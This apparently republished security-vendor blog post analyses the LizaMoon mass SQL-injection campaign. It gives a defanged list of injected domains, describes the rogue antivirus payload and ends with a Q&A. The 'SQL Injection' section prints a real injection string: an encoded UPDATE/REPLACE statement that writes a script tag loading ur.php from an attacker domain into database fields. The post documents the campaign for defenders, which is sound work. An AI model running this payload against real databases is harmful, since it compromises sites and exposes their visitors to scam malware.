Chris Mosby at myITforum.com

The LizaMoon mass-injection campaign is still ongoing and more than 500,000 URLs have a script link to lizamoon.com according to Google Search results. We have also been able to identify several other URLs that are injected in the exact same way, so the attack is even bigger than we originally thought. All in all, a Google Search reveals over 1,500,000 URLs that have a link with the same URL structure as the initial attack. Google Search results aren't always great indicators of how prevalent or widespread an attack is as it counts each unique URL, not domain or site, but it does give some indication of the scope of the problem if you look at how the numbers go up or down.

Additional injected URLs

Here's a list of domains that we have identified so far (with help from blog comment posters; thanks for that guys!).

hxxp://lizamoon.com/ur.php
hxxp://tadygus.com/ur.php
hxxp://alexblane.com/ur.php
hxxp://alisa-carter.com/ur.php
hxxp://online-stats201.info/ur.php
hxxp://stats-master111.info/ur.php
hxxp://agasi-story.info/ur.php
hxxp://general-st.info/ur.php
hxxp://extra-service.info/ur.php
hxxp://t6ryt56.info/ur.php
hxxp://sol-stats.info/ur.php
hxxp://google-stats49.info/ur.php
hxxp://google-stats45.info/ur.php
hxxp://google-stats50.info/ur.php
hxxp://stats-master88.info/ur.php
hxxp://eva-marine.info/ur.php
hxxp://stats-master99.info/ur.php
hxxp://worid-of-books.com/ur.php
hxxp://google-server43.info/ur.php
hxxp://tzv-stats.info/ur.php
hxxp://milapop.com/ur.php

The domain stats-master111.info was registered on October 21, 2010 which could mean the first attack happened then but we don't have any evidence of that. The first confirmed case that we know of is from December 2010, but we didn't make the connection to LizaMoon until today. The last domain, milapop.com, was registered today.

SQL Injection

We were able to find more information about the SQL Injection itself (thanks Peter) and the command is par for the course when it comes to SQL Injections. Here's one example:

+update+Table+set+FieldName=REPLACE(cast(FieldName+as+varchar(8000)),cast(char(60)%2Bchar(47)
%2Bchar(116)%2Bchar(105)%2Bchar(116)%2Bchar(108)%2Bchar(101)%2Bchar(62)%2Bchar(60)%2Bchar(115)
%2Bchar(99)%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(32)%2Bchar(115)%2Bchar(114)
%2Bchar(99)%2Bchar(61)%2Bchar(104)%2Bchar(116)%2Bchar(116)%2Bchar(112)%2Bchar(58)%2Bchar(47)
%2Bchar(47)%2Bchar(103)%2Bchar(111)%2Bchar(111)%2Bchar(103)%2Bchar(108)%2Bchar(101)%2Bchar(45)
%2Bchar(115)%2Bchar(116)%2Bchar(97)%2Bchar(116)%2Bchar(115)%2Bchar(53)%2Bchar(48)%2Bchar(46)
%2Bchar(105)%2Bchar(110)%2Bchar(102)%2Bchar(111)%2Bchar(47)%2Bchar(117)%2Bchar(114)%2Bchar(46)
%2Bchar(112)%2Bchar(104)%2Bchar(112)%2Bchar(62)%2Bchar(60)%2Bchar(47)%2Bchar(115)%2Bchar(99)
%2Bchar(114)%2Bchar(105)%2Bchar(112)%2Bchar(116)%2Bchar(62)+as+varchar(8000)),cast(char(32)
+as+varchar(8)))--

More information is available over on Stackoverflow.com.

Injected code

Here is the content of an example ur.php file. The content isn't even obfuscated which is somewhat unusual. All the code does is a redirect to a rogue AV site. We've seen the scripts change over time to redirect to several different rogue AV sites:

What happens to the user?

We wrote in an earlier post that the payload site doesn't work properly, but further testing shows that it does and we created a video showing what happens if a user visits a website that contains the injected code. The video is available at the end of this post. The user only gets the malicious code once per IP address, so if you've already visited the site you won't get the code again. This is something we see often in attacks, especially in exploit kits.

The Rogue AV software that is installed is called Windows Stability Center and the file that is downloaded is currently detected by 13/43 anti-virus engines according to VirusTotal.

The software then displays a warning that there are lots of problems on your PC. To fix them you have to pay for the full version of the application. Very traditional rogue AV scam. Dancho Danchev has some more information on his blog.

Where are users coming from?

We looked at reports of traffic to lizamoon.com as indicated by data collected by the Websense Threatseeker Network and here's a graph of where those users are located.

So what about iTunes?

We received blog comments from our readers (keep them coming, we read them all!) and some were critical of our use of iTunes in the title of the previous post and how we stated that iTunes URLs had been compromised, but the script neutered by Apple. All of what we stated was technically correct, but perhaps we didn't make it clear enough.

Every time there's a mass-injection like this, and there really hasn't been anything this big before, we try to identify larger systems and sites that have been affected to give some indication of how wide the attack has spread. And there are few systems out there bigger than iTunes, so when we saw that content on itunes.apple.com contained the injected link we wanted to make people aware of that, even if the script didn't work. It seems that some readers weren't too happy about that and argued that we could also say that Google Search was compromised because it also shows the injected code in search results. We don't really agree with that, but perhaps we shouldn't have highlighted it the way we did.

Questions & Answers about the LizaMoon mass-injection

Q: Why is this called LizaMoon?
A: The first domain we saw on March 29, 2011 was called lizamoon.com

Q: How many sites have been affected by this?
A: It's really hard to say. Google Search indicates it's over 1.5 million URLs but that number could be over-inflated. It's safe to say it's in the hundreds of thousands.

Q: How does the script get added to the compromised sites?
A: We're still looking into that. We know that it uses SQL Injection to do it and not XSS as some of our blog readers have suggested.

Q: How do you know it's using SQL Injection?
A: We have been contacted by people who have seen the code in their Microsoft SQL databases. So far we have only had reports of Microsoft SQL Server 2003 and 2005 being affected, so if you have any information that says that 2008 has been hit as well, we'd like to know about it.

Q: Could this mean that there's a vulnerability in Microsoft SQL Server 2003 and 2005?
A: We don't know, but we don't think so. Most likely there are vulnerabilities in the Web systems used by these sites, such as outdated CMS and blog systems.

Q: What happens when I visit a site that contains the injected script?
A: Your PC will get redirected to a rogue AV site, displaying fake information about your PC being infected.

Q: Will I get redirected over and over again if I visit a compromised site?
A: No, the script only redirects you once.

Q: When will the LizaMoon attack be over?
A: Not anytime soon. We're still seeing references to Gumblar, which was a mass-injection attack found in 2009.